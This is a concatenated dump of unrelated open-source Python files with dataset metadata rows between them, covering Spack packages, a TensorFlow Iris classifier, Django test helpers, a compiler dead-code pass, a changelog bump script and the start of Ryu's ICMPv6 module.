gnu_mirror_path = "diffutils/diffutils-3.7.tar.xz"
version('3.7', sha256='b3a7a6221c3dc916085f0d205abf6b8e1ba443d4dd965118da364a1dc1cb3a26')
version('3.6', sha256='d621e8bdd4b573918c8145f7ae61817d1be9deb4c8d2328a65cea8e11d783bd6')
build_directory = 'spack-build'
patch('nvhpc.patch', when='@3.7 %nvhpc')
depends_on('iconv')
def setup_build_environment(self, env):
if self.spec.satisfies('%fj'):
env.append_flags('CFLAGS',
'-Qunused-arguments')
@classmethod
def determine_version(cls, exe):
output = Executable(exe)('--version', output=str, error=str)
match = re.search(r'diff \(GNU diffutils\) (\S+)', output)
return match.group(1) if match else None
| lgpl-2.1 | -8,120,714,615,899,992,000 | 31.789474 | 93 | 0.683788 | false | 3.162437 | false | false | false |
theoryclub/tf_workshop | Iris.py | 1 | 4006 | import tensorflow as tf
import numpy as np
import struct
import math
import os
path=os.path.dirname(os.path.realpath(__file__))
def normalize(v):
norm=np.linalg.norm(v)
if norm==0:
return v
return v/norm
def readToLines(file):
csvFile=open(file)
lines=csvFile.read().splitlines()
csvFile.close()
splitLines=[]
for line in lines:
splitLines+=[line.split(',')]
return splitLines
FEATURES=4
NUM_CLASSES=3
hidden1_num_neurons=2 #neurons in first layer
output_num_neurons=NUM_CLASSES #neurons in second (output) layer. Each neuron corresponds to an Iris class; the predicted class is the index of the
#output neuron with the highest activation
#function to read MNIST images and labels into numpy matrices
def loadData(file):
splitLines=readToLines(file)
global FEATURES
    features=np.zeros([len(splitLines)-1, FEATURES])
    labels=np.zeros([len(splitLines)-1, NUM_CLASSES])
    for dataInd in range(0, len(splitLines)-1):
splitLine=splitLines[dataInd]
features[dataInd, :]=splitLine[:4]
labels[dataInd, int(splitLine[4])]=1.0
for ind in range(0, len(features[0])):
features[:, ind]=normalize(features[:, ind])
return features[0:int(3*(len(splitLines)-1)/4)], labels[0:int(3*(len(splitLines)-1)/4)], features[int(3*(len(splitLines)-1)/4):], labels[int(3*(len(splitLines)-1)/4):]
def getClassificationAccuracy(networkOutputs, trueLabels):
numberCorrect=0.0
for labelInd in range(0, len(trueLabels)):
if trueLabels[labelInd][np.argmax(networkOutputs[labelInd], 0)]==1:
numberCorrect=numberCorrect+1
print('Classification Accuracy: '+str(100*(numberCorrect/len(trueLabels)))+'%')
print('Training a neural network on the Iris classification problem')
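# Network: 4 input features -> 2 sigmoid hidden units -> 3 softmax outputs
# (one per Iris class), trained with mean squared error and the Adam optimizer.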
inputs = tf.placeholder(tf.float32, ([None, FEATURES])) #inputs placeholder
trueOutput = tf.placeholder(tf.float32, ([None, NUM_CLASSES])) #correct class label placeholder
#first layer weights and biases
weights1 = tf.Variable(tf.random_normal([FEATURES, hidden1_num_neurons]))
biases1 = tf.Variable(tf.zeros([hidden1_num_neurons]))
hidden1 = tf.nn.sigmoid(tf.matmul(inputs, weights1) + biases1)
#second layer weights and biases
weights2 = tf.Variable(tf.random_normal([hidden1_num_neurons, output_num_neurons]))
biases2 = tf.Variable(tf.zeros([output_num_neurons]))
output = tf.nn.softmax(tf.matmul(hidden1, weights2) + biases2)
#loss function: mean squared error
loss=tf.reduce_mean(tf.square(tf.subtract(output, trueOutput)))
#specify optimization operation ('train op')
optimizer = tf.train.AdamOptimizer()
global_step = tf.Variable(0, name='global_step', trainable=False)
train_op = optimizer.minimize(loss, global_step=global_step)
#read the Iris features and labels
trainImages, trainLabels, valImages, valLabels=loadData('./data/Iris.csv')
#train neural network
BATCH_SIZE=2500;
with tf.Session() as session:
tf.initialize_all_variables().run()
    #train for 40 epochs over the Iris training set
for i in range(0, 40):
shuffle=np.random.permutation(len(trainImages))
sessLoss=0.0
        sessOutput=np.zeros([len(trainImages), NUM_CLASSES])
for batchInd in range(0, len(trainImages), BATCH_SIZE):
_, batchLoss, batchOutput=session.run([train_op, loss, output], feed_dict={inputs: trainImages[shuffle[batchInd:batchInd+BATCH_SIZE]],
trueOutput: trainLabels[shuffle[batchInd:batchInd+BATCH_SIZE]]})
sessLoss+=batchLoss
sessOutput[batchInd:batchInd+BATCH_SIZE]=batchOutput
print('Epoch '+str(i)+' train loss', sessLoss)
getClassificationAccuracy(sessOutput, trainLabels)
print()
sessLoss, sessOutput=session.run([loss, output], feed_dict={inputs: valImages, trueOutput: valLabels})
print('test loss', sessLoss)
getClassificationAccuracy(sessOutput, valLabels)
| mit | -7,951,701,745,459,195,000 | 38.27451 | 171 | 0.696455 | false | 3.51712 | false | false | false |
RTHMaK/RPGOne | deep_qa-master/scripts/get_nearest_neighbors.py | 1 | 2100 | import argparse
import codecs
import logging
from pyhocon import ConfigFactory
from deep_qa.common.checks import ensure_pythonhashseed_set
from deep_qa.data.instances.instance import TextInstance
from deep_qa.models.memory_networks.differentiable_search import DifferentiableSearchMemoryNetwork
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
def main():
"""
This script loads a DifferentiableSearchSolver model, encodes a corpus and the sentences in a
given file, and finds nearest neighbors in the corpus for all of the sentences in the file,
using the trained sentence encoder.
"""
argparser = argparse.ArgumentParser(description="Neural Network Solver")
argparser.add_argument('--param_file', type=str, required=True,
help='Path to file containing solver parameters')
argparser.add_argument('--sentence_file', type=str, required=True,
help='Path to sentence file, for which we will find nearest neighbors')
argparser.add_argument('--output_file', type=str, required=True,
help='Place to save results of nearest neighbor search')
args = argparser.parse_args()
param_file = args.param_file
params = ConfigFactory.parse_file(param_file)
solver = DifferentiableSearchMemoryNetwork(**params) # TODO(matt): fix this in the next PR
solver.load_model()
with codecs.open(args.output_file, 'w', 'utf-8') as outfile:
for line in codecs.open(args.sentence_file, 'r', 'utf-8').readlines():
outfile.write(line)
instance = TextInstance(line.strip(), True)
neighbors = solver.get_nearest_neighbors(instance)
for neighbor in neighbors:
outfile.write('\t')
outfile.write(neighbor.text)
outfile.write('\n')
outfile.write('\n')
if __name__ == "__main__":
ensure_pythonhashseed_set()
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
level=logging.INFO)
main()
| apache-2.0 | -3,488,670,208,409,844,000 | 41.857143 | 98 | 0.661429 | false | 4.2 | false | false | false |
blumug/texapi | core/tests_utils.py | 1 | 1204 | import json
from django.contrib.auth.models import User
from django.test.client import Client
from django.core.urlresolvers import reverse
from rest_framework.authtoken.models import Token
from api_users.models import ApiUser
def generate_api_user(username='user', email='[email protected]', password='password', login=True):
"""Generate app user
Args:
username: username
email: email
password: password
login: if set to True, a login query is made
Returns:
user, token, header
"""
token = None
header = None
user = User.objects.create(
username=username, email=email, is_active=True)
ApiUser.objects.create(user=user)
user.set_password('password')
user.save()
c = Client()
data = {
        'email': email,
        'password': password,
}
json_data = json.dumps(data)
if login is True:
res = c.post(reverse('api_login'),
json_data, content_type='application/json')
data = json.loads(res.content)
token = Token.objects.get(user=user).key
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token)}
return user, token, header
| mit | 3,645,814,566,693,316,600 | 25.755556 | 95 | 0.634551 | false | 3.909091 | false | false | false |
qiyuangong/leetcode | python/108_Convert_Sorted_Array_to_Binary_Search_Tree.py | 2 | 1027 | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
# def sortedArrayToBST(self, nums):
# """
# :type nums: List[int]
# :rtype: TreeNode
# """
# # Recursion with slicing
# if not nums:
# return None
# mid = len(nums) / 2
# root = TreeNode(nums[mid])
# root.left = self.sortedArrayToBST(nums[:mid])
# root.right = self.sortedArrayToBST(nums[mid + 1:])
# return root
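    # Index-based recursion: the middle element becomes the root and the two
    # halves build the left and right subtrees, giving a height-balanced BST
    # without the list copies made by the slicing version above.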
def sortedArrayToBST(self, nums):
# Recursion with index
return self.getHelper(nums, 0, len(nums) - 1)
def getHelper(self, nums, start, end):
if start > end:
return None
mid = (start + end) / 2
node = TreeNode(nums[mid])
node.left = self.getHelper(nums, start, mid - 1)
node.right = self.getHelper(nums, mid + 1, end)
return node | mit | 6,595,800,867,033,099,000 | 29.235294 | 60 | 0.53554 | false | 3.389439 | false | false | false |
pfalcon/ScratchABlock | dce.py | 1 | 1917 | import logging
from core import *
_log = logging.getLogger(__file__)
def make_dead(insts, idx):
org_inst = insts[idx]
if org_inst.op == "DEAD":
return
if org_inst.side_effect():
org_inst.dest = None
else:
dead = Inst(None, "DEAD", [])
dead.addr = org_inst.addr
insts[idx] = dead
insts[idx].comments["org_inst"] = org_inst
def dead_code_elimination_forward(bblock):
"""Try to perform eliminations using forward flow. This is reverse
to the natural direction, and requires multiple passing over
bblock to stabilize. Don't use it, here only for comparison."""
vars = bblock.defs()
for v in vars:
last = None
for i, inst in enumerate(bblock.items):
if v in inst.args:
last = None
if inst.dest == v:
if last is not None:
make_dead(bblock.items, last)
last = i
node = bblock.cfg[bblock.addr]
live_out = node.get("live_out")
if last is not None and live_out is not None:
if v not in live_out:
make_dead(bblock.items, last)
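# Backward variant: start from the basic block's live_out set and walk the
# instructions in reverse, so a definition whose destination is not live at
# that point can be killed in a single pass.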
def dead_code_elimination_backward(bblock):
node = bblock.cfg[bblock.addr]
live = node.get("live_out")
if live is None:
_log.warn("BBlock %s: No live_out set, conservatively assuming all defined vars are live", bblock.addr)
live = bblock.defs()
live = live.copy()
changes = False
for i in range(len(bblock.items) - 1, -1, -1):
inst = bblock.items[i]
if isinstance(inst.dest, REG):
if inst.dest in live:
live.remove(inst.dest)
else:
make_dead(bblock.items, i)
changes = True
inst = bblock.items[i]
live |= inst.uses()
return changes
dead_code_elimination = dead_code_elimination_backward
| gpl-3.0 | -6,786,215,095,110,471,000 | 28.045455 | 111 | 0.567553 | false | 3.623819 | false | false | false |
PyCQA/pylint | script/bump_changelog.py | 1 | 5851 | # ORIGINAL here: https://github.com/PyCQA/astroid/blob/main/script/bump_changelog.py
# DO NOT MODIFY DIRECTLY
"""
This script permits to upgrade the changelog in astroid or pylint when releasing a version.
"""
# pylint: disable=logging-fstring-interpolation
import argparse
import enum
import logging
from datetime import datetime
from pathlib import Path
from typing import List
DEFAULT_CHANGELOG_PATH = Path("ChangeLog")
RELEASE_DATE_TEXT = "Release date: TBA"
WHATS_NEW_TEXT = "What's New in Pylint"
TODAY = datetime.now()
FULL_WHATS_NEW_TEXT = WHATS_NEW_TEXT + " {version}?"
NEW_RELEASE_DATE_MESSAGE = "Release date: {}".format(TODAY.strftime("%Y-%m-%d"))
def main() -> None:
parser = argparse.ArgumentParser(__doc__)
parser.add_argument("version", help="The version we want to release")
parser.add_argument(
"-v", "--verbose", action="store_true", default=False, help="Logging or not"
)
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
logging.debug(f"Launching bump_changelog with args: {args}")
if "dev" in args.version:
return
with open(DEFAULT_CHANGELOG_PATH) as f:
content = f.read()
content = transform_content(content, args.version)
with open(DEFAULT_CHANGELOG_PATH, "w") as f:
f.write(content)
class VersionType(enum.Enum):
MAJOR = 0
MINOR = 1
PATCH = 2
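# Version arithmetic used below, e.g. get_next_version("2.6.1", VersionType.PATCH)
# -> "2.6.2" and get_next_version("2.6.1", VersionType.MINOR) -> "2.7.0":
# every component after the bumped one is reset to zero.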
def get_next_version(version: str, version_type: VersionType) -> str:
new_version = version.split(".")
part_to_increase = new_version[version_type.value]
if "-" in part_to_increase:
part_to_increase = part_to_increase.split("-")[0]
for i in range(version_type.value, 3):
new_version[i] = "0"
new_version[version_type.value] = str(int(part_to_increase) + 1)
return ".".join(new_version)
def get_next_versions(version: str, version_type: VersionType) -> List[str]:
if version_type == VersionType.PATCH:
# "2.6.1" => ["2.6.2"]
return [get_next_version(version, VersionType.PATCH)]
if version_type == VersionType.MINOR:
# "2.6.0" => ["2.7.0", "2.6.1"]
assert version.endswith(".0"), f"{version} does not look like a minor version"
else:
# "3.0.0" => ["3.1.0", "3.0.1"]
assert version.endswith(".0.0"), f"{version} does not look like a major version"
next_minor_version = get_next_version(version, VersionType.MINOR)
next_patch_version = get_next_version(version, VersionType.PATCH)
logging.debug(f"Getting the new version for {version} - {version_type.name}")
return [next_minor_version, next_patch_version]
def get_version_type(version: str) -> VersionType:
if version.endswith("0.0"):
version_type = VersionType.MAJOR
elif version.endswith("0"):
version_type = VersionType.MINOR
else:
version_type = VersionType.PATCH
return version_type
def get_whats_new(
version: str, add_date: bool = False, change_date: bool = False
) -> str:
whats_new_text = FULL_WHATS_NEW_TEXT.format(version=version)
result = [whats_new_text, "=" * len(whats_new_text)]
if add_date and change_date:
result += [NEW_RELEASE_DATE_MESSAGE]
elif add_date:
result += [RELEASE_DATE_TEXT]
elif change_date:
raise ValueError("Can't use change_date=True with add_date=False")
logging.debug(
f"version='{version}', add_date='{add_date}', change_date='{change_date}': {result}"
)
return "\n".join(result)
def get_all_whats_new(version: str, version_type: VersionType) -> str:
result = ""
for version_ in get_next_versions(version, version_type=version_type):
result += get_whats_new(version_, add_date=True) + "\n" * 4
return result
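# transform_content stamps today's date on the "Release date: TBA" entry of the
# version being released and prepends fresh "What's New" stanzas for the next
# versions, after do_checks has validated the changelog layout.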
def transform_content(content: str, version: str) -> str:
version_type = get_version_type(version)
next_version = get_next_version(version, version_type)
old_date = get_whats_new(version, add_date=True)
new_date = get_whats_new(version, add_date=True, change_date=True)
next_version_with_date = get_all_whats_new(version, version_type)
do_checks(content, next_version, version, version_type)
index = content.find(old_date)
logging.debug(f"Replacing\n'{old_date}'\nby\n'{new_date}'\n")
content = content.replace(old_date, new_date)
end_content = content[index:]
content = content[:index]
logging.debug(f"Adding:\n'{next_version_with_date}'\n")
content += next_version_with_date + end_content
return content
def do_checks(content, next_version, version, version_type):
err = "in the changelog, fix that first!"
NEW_VERSION_ERROR_MSG = (
"The text for this version '{version}' did not exists %s" % err
)
NEXT_VERSION_ERROR_MSG = (
"The text for the next version '{version}' already exists %s" % err
)
wn_next_version = get_whats_new(next_version)
wn_this_version = get_whats_new(version)
# There is only one field where the release date is TBA
if version_type in [VersionType.MAJOR, VersionType.MINOR]:
assert (
content.count(RELEASE_DATE_TEXT) <= 1
), f"There should be only one release date 'TBA' ({version}) {err}"
else:
next_minor_version = get_next_version(version, VersionType.MINOR)
assert (
content.count(RELEASE_DATE_TEXT) <= 2
), f"There should be only two release dates 'TBA' ({version} and {next_minor_version}) {err}"
# There is already a release note for the version we want to release
assert content.count(wn_this_version) == 1, NEW_VERSION_ERROR_MSG.format(
version=version
)
# There is no release notes for the next version
assert content.count(wn_next_version) == 0, NEXT_VERSION_ERROR_MSG.format(
version=next_version
)
if __name__ == "__main__":
main()
| gpl-2.0 | -1,239,026,852,657,562,600 | 35.798742 | 101 | 0.65664 | false | 3.337707 | false | false | false |
Tigge/platinumshrimp | plugins/feedretriever/test/test_basic_feed.py | 1 | 1797 | import os
import unittest
import unittest.mock
import feedparser
from plugins.feedretriever.feedretriever import Feedpoller
def noop(*a, **kw):
pass
feedparse = feedparser.parse
class FeedRetriverTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.dir = os.path.join("..", os.path.dirname(__file__))
@unittest.mock.patch("feedparser.parse")
def test_basic_feed(self, read):
read.return_value = feedparse(os.path.join(self.dir, "basic_rss_0-entries.xml"))
Feedpoller(
{"url": "MOCK_URL", "title": "MOCK_TITLE"},
on_created=noop,
on_entry=noop,
on_error=self.fail,
)
@unittest.mock.patch("feedparser.parse")
def test_no_update(self, read):
read.return_value = feedparse(os.path.join(self.dir, "basic_rss_0-entries.xml"))
feed = Feedpoller(
{"url": "MOCK_URL", "title": "MOCK_TITLE"},
on_created=noop,
on_entry=self.fail,
on_error=self.fail,
)
feed.update_now()
@unittest.mock.patch("feedparser.parse")
def test_initial_update(self, read):
read.return_value = feedparse(os.path.join(self.dir, "basic_rss_0-entries.xml"))
def on_entry(feed, entry):
self.assertEqual(entry.title, "Test Title")
self.assertEqual(entry.link, "http://www.example.com")
self.updated = True
feed = Feedpoller(
{"url": "MOCK_URL", "title": "Test"},
on_created=noop,
on_entry=on_entry,
on_error=self.fail,
)
self.updated = False
read.return_value = feedparse(os.path.join(self.dir, "basic_rss_1-entries.xml"))
feed.update_now()
self.assertTrue(self.updated)
| mit | -1,768,466,555,112,967,400 | 28.459016 | 88 | 0.589872 | false | 3.509766 | true | false | false |
mediawiki-utilities/python-mwsessions | mwsessions/tests/test_sessionizer.py | 1 | 1236 | from nose.tools import eq_
from ..sessionizer import Sessionizer
def test_sessionizer():
sessionizer = Sessionizer(cutoff=2)
user_sessions = list(sessionizer.process("foo", 1))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process("bar", 2))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process("foo", 2))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process("bar", 10))
eq_(len(user_sessions), 2)
user_sessions = list(sessionizer.get_active_sessions())
eq_(len(user_sessions), 1)
def test_none_comparison():
sessionizer = Sessionizer(cutoff=2)
user_sessions = list(sessionizer.process((None, "123"), 0, "AIDS"))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process((1, "foobar"), 1, "Foobar"))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process((1, "foobar"), 1, None))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process((None, "234"), 1, "Foobar"))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process((None, "234"), 1, "Barfoo"))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process((1, "foobar"), 10))
eq_(len(user_sessions), 3)
| mit | -2,459,536,942,961,869,300 | 27.090909 | 73 | 0.640777 | false | 3.404959 | false | false | false |
EmreAtes/spack | var/spack/repos/builtin/packages/py-jpype/package.py | 5 | 1891 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyJpype(PythonPackage):
"""JPype is an effort to allow python programs full access to java class
libraries."""
homepage = "https://github.com/originell/jpype"
url = "https://pypi.io/packages/source/J/JPype1/JPype1-0.6.2.tar.gz"
version('0.6.2', '16e5ee92b29563dcc63bbc75556810c1')
version('0.6.1', '468ca2d4b2cff7802138789e951d5d58')
version('0.6.0', 'f0cbbe1d0c4b563f7e435d2bffc31736')
depends_on('[email protected]:')
depends_on('py-setuptools', type='build')
depends_on('java', type=('build', 'run'))
# extra requirements
# depends_on('[email protected]:', type=('build', 'run'))
| lgpl-2.1 | 2,660,631,295,842,671,600 | 41.977273 | 78 | 0.669487 | false | 3.629559 | false | false | false |
massimovassalli/wound | wound.py | 1 | 9075 | from PyQt5 import QtCore, QtGui, QtWidgets
_fromUtf8 = lambda s: s
import sys,os
import wound_view as view
import engine
class woundWindow ( QtWidgets.QMainWindow ):
def __init__ ( self, parent = None ):
QtWidgets.QMainWindow.__init__( self, parent )
self.setWindowTitle( 'Scratch Test Wizard' )
self.ui = view.Ui_facewindow()
self.ui.setupUi( self )
self.setConnections()
self.rebuilding = False
self.selectedItem = None
def refreshTree(self):
self.rebuilding = True
self.ui.treeWidget.clear()
for i in range(len(self.exp)):
el = QtWidgets.QTreeWidgetItem(self.ui.treeWidget)
el.src= self.exp[i]
if self.exp[i].time is None:
tm = 'T{}'.format(i)
else:
tm = self.exp[i].time
el.setText(0,tm)
for w in self.exp[i]:
e = QtWidgets.QTreeWidgetItem(el)
e.src = w
e.setText(0,w.basename)
#e.setBackground(0,QtGui.QColor(255, 0, 0, 127))
n=1
for p in w:
o = QtWidgets.QTreeWidgetItem(e)
o.src = p
o.setText(0, p.filename)
#o.setForeground(0,QtGui.QColor(255,0,0,255))
self.ui.treeWidget.addTopLevelItem(el)
self.rebuilding = False
#fname = QtWidgets.QFileDialog.getOpenFileName(self, 'Select file', './')
#q = QtWidgets.QFileDialog()
#q.setAcceptMode(QtWidgets.QFileDialog.AcceptOpen)
#q.setFileMode(QtWidgets.QFileDialog.ExistingFiles)
#progress = QtWidgets.QProgressDialog("Opening files...", "Cancel opening", 0, pmax)
def selectElement(self,item):
if self.rebuilding is True:
return
self.selectedItem = item
self.ui.statusBar.showMessage('ITEM {} depth {}'.format(item.src.basename,item.src.depth))
#self.ui.treeWidget.itemWidget()
def expSave(self):
filtered = QtWidgets.QFileDialog.getSaveFileName(self,caption='Save the experiment',filter='*.exp')
if filtered[0] != '':
filename = filtered[0]
if filename[-4:] != '.exp':
filename = filename + '.exp'
self.exp.save(filename)
def expLoad(self):
selection = QtWidgets.QFileDialog.getOpenFileName (self, caption='Select an experiment file',filter='*.exp')
filename = selection[0]
if not os.path.isfile(filename):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
self.exp = engine.load(filename)
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
def expGuess(self):
folder = QtWidgets.QFileDialog.getExistingDirectory(self, 'Select a directory', './')
if not os.path.isdir(folder):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
exp = engine.exp()
if exp.guess(folder):
self.exp = exp
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
else:
QtWidgets.QApplication.restoreOverrideCursor()
QtWidgets.QMessageBox.information(self, 'ERROR', 'The proposed directory could not be guessed as an experiment')
def rewatch(self):
self.watch()
def watch(self,element=None):
if self.rebuilding is True:
return
if element is None:
element = self.selectedItem
myelement = element.src
if myelement.is_picture():
QtWidgets.QApplication.setOverrideCursor( QtGui.QCursor(QtCore.Qt.WaitCursor))
if self.ui.view_raw.isChecked():
self.ui.pic.setPixmap( QtGui.QPixmap(myelement.dir) )
elif self.ui.view_stored.isChecked():
if myelement.isProcessed():
self.ui.pic.setPixmap(QtGui.QPixmap(myelement.getOverlay()))
else:
self.ui.pic.setPixmap(QtGui.QPixmap(myelement.dir))
elif self.ui.view_otf.isChecked():
myelement.process( sens = self.ui.cannysigma.value()/100.0, minhole=self.ui.minholes.value(),minobj=self.ui.minobj.value() )
self.ui.pic.setPixmap(QtGui.QPixmap(myelement.getOverlay()))
QtWidgets.QApplication.restoreOverrideCursor()
def tpAdd(self):
folder = QtWidgets.QFileDialog.getExistingDirectory(self, 'Select a TimePoint directory', './')
if not os.path.isdir(folder):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
tp = engine.timepoint()
if tp.guess(folder):
self.exp.append(tp)
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
else:
QtWidgets.QApplication.restoreOverrideCursor()
QtWidgets.QMessageBox.information(self, 'ERROR', 'The proposed directory could not be guessed as a TimePoint')
def tpDel(self):
tp = self.selectedItem.src
if tp.is_timepoint():
id = self.exp.index(tp)
del(self.exp[id])
self.refreshTree()
def wellAdd(self):
tp = self.selectedItem.src
if tp.is_timepoint():
folder = QtWidgets.QFileDialog.getExistingDirectory(self, 'Select a TimePoint directory', './')
if not os.path.isdir(folder):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
well = engine.well()
if well.guess(folder):
tp.append(well)
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
else:
QtWidgets.QApplication.restoreOverrideCursor()
QtWidgets.QMessageBox.information(self, 'ERROR', 'The proposed directory could not be guessed as a Well')
def wellDel(self):
well = self.selectedItem.src
if well.is_well():
id = well.parent.index(well)
del(well.parent[id])
self.refreshTree()
def picDel(self):
pic = self.selectedItem.src
if pic.is_picture():
id = pic.parent.index(pic)
del (pic.parent[id])
self.refreshTree()
def picAdd(self):
tp = self.selectedItem.src
if tp.is_well():
selection = QtWidgets.QFileDialog.getOpenFileName(self, caption='Select a Picture', filter='*.*')
filename = selection[0]
if not os.path.isfile(filename):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
pic = engine.picture()
if pic.guess(filename):
tp.append(pic)
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
else:
QtWidgets.QApplication.restoreOverrideCursor()
QtWidgets.QMessageBox.information(self, 'ERROR', 'The proposed directory could not be guessed as a Well')
def setConnections(self):
#clickable1=[self.ui.radio_view,self.ui.radio_deriv,self.ui.radio_smooth]
#editable =[self.ui.derorder,self.ui.s_mth,self.ui.s_vth,self.ui.sg_fw,self.ui.sg_mm,self.ui.plath,self.ui.lasth]
#for o in clickable1:
# o.clicked.connect(self.refreshCurve)
#for o in editable:
# o.editingFinished.connect(self.updateCurve)
# o.valueChanged.connect(self.reddish)
self.ui.actionGuess.triggered.connect(self.expGuess)
self.ui.actionLoad.triggered.connect(self.expLoad)
self.ui.actionSave.triggered.connect(self.expSave)
self.ui.treeWidget.currentItemChanged.connect(self.selectElement)
self.ui.actionAdd.triggered.connect(self.tpAdd)
self.ui.actionRemove.triggered.connect(self.tpDel)
self.ui.actionAddWell.triggered.connect(self.wellAdd)
self.ui.actionRemoveWell.triggered.connect(self.wellDel)
self.ui.actionAddPic.triggered.connect(self.picAdd)
self.ui.actionRemovePic.triggered.connect(self.picDel)
self.ui.treeWidget.currentItemChanged.connect(self.watch)
self.ui.view_stored.clicked.connect(self.rewatch)
self.ui.view_raw.clicked.connect(self.rewatch)
self.ui.view_otf.clicked.connect(self.rewatch)
self.ui.cannysigma.valueChanged.connect(self.rewatch)
self.ui.minobj.valueChanged.connect(self.rewatch)
self.ui.minholes.valueChanged.connect(self.rewatch)
QtCore.QMetaObject.connectSlotsByName(self)
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
app.setApplicationName( 'Scratch assay Wizard' )
canale = woundWindow()
canale.show()
#QtCore.QObject.connect( app, QtCore.SIGNAL( 'lastWindowClosed()' ), app, QtCore.SLOT( 'quit()' ) )
sys.exit(app.exec_())
| gpl-3.0 | -9,087,444,954,185,123,000 | 39.333333 | 140 | 0.614325 | false | 3.952526 | false | false | false |
AstroTech/workshop-python | design-patterns/solution/iterator_addressbook.py | 1 | 1148 | class Kontakt:
def __init__(self, imie, nazwisko, adresy=[]):
self.imie = imie
self.nazwisko = nazwisko
self.adresy = adresy
def __iter__(self):
self.current_element = 0
return self
def __next__(self):
if self.current_element >= len(self.adresy):
raise StopIteration
address = self.adresy[self.current_element]
self.current_element += 1
return address
class Adres:
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return f'{self.__dict__}'
kontakt = Kontakt(imie='Jan', nazwisko='Twardowski', adresy=[
Adres(ulica='2101 E NASA Pkwy', miasto='Houston', stan='Texas',
kod='77058', panstwo='USA'),
Adres(ulica=None, miasto='Kennedy Space Center', kod='32899',
panstwo='USA'),
Adres(ulica='4800 Oak Grove Dr', miasto='Pasadena', kod='91109',
panstwo='USA'),
Adres(ulica='2825 E Ave P', miasto='Palmdale', stan='California',
kod='93550', panstwo='USA'),
])
for adres in kontakt:
print(adres)
| mit | 1,112,297,815,520,693,000 | 27 | 69 | 0.579268 | false | 2.94359 | false | false | false |
citrix-openstack-build/ryu | ryu/lib/packet/icmpv6.py | 2 | 19717 | # Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import struct
import sys
import array
import binascii
from . import packet_base
from . import packet_utils
from ryu.lib import addrconv
from ryu.lib import stringify
ICMPV6_DST_UNREACH = 1 # dest unreachable, codes:
ICMPV6_PACKET_TOO_BIG = 2 # packet too big
ICMPV6_TIME_EXCEEDED = 3 # time exceeded, code:
ICMPV6_PARAM_PROB = 4 # ip6 header bad
ICMPV6_ECHO_REQUEST = 128 # echo service
ICMPV6_ECHO_REPLY = 129 # echo reply
MLD_LISTENER_QUERY = 130 # multicast listener query
MLD_LISTENER_REPOR = 131 # multicast listener report
MLD_LISTENER_DONE = 132 # multicast listener done
# RFC2292 decls
ICMPV6_MEMBERSHIP_QUERY = 130 # group membership query
ICMPV6_MEMBERSHIP_REPORT = 131 # group membership report
ICMPV6_MEMBERSHIP_REDUCTION = 132 # group membership termination
ND_ROUTER_SOLICIT = 133 # router solicitation
ND_ROUTER_ADVERT = 134 # router advertisement
ND_NEIGHBOR_SOLICIT = 135 # neighbor solicitation
ND_NEIGHBOR_ADVERT = 136 # neighbor advertisement
ND_REDIREC = 137 # redirect
ICMPV6_ROUTER_RENUMBERING = 138 # router renumbering
ICMPV6_WRUREQUEST = 139 # who are you request
ICMPV6_WRUREPLY = 140 # who are you reply
ICMPV6_FQDN_QUERY = 139 # FQDN query
ICMPV6_FQDN_REPLY = 140 # FQDN reply
ICMPV6_NI_QUERY = 139 # node information request
ICMPV6_NI_REPLY = 140 # node information reply
ICMPV6_MAXTYPE = 201
class icmpv6(packet_base.PacketBase):
"""ICMPv6 (RFC 2463) header encoder/decoder class.
An instance has the following attributes at least.
    Most of them are the same as the on-wire counterparts, but in host byte order.
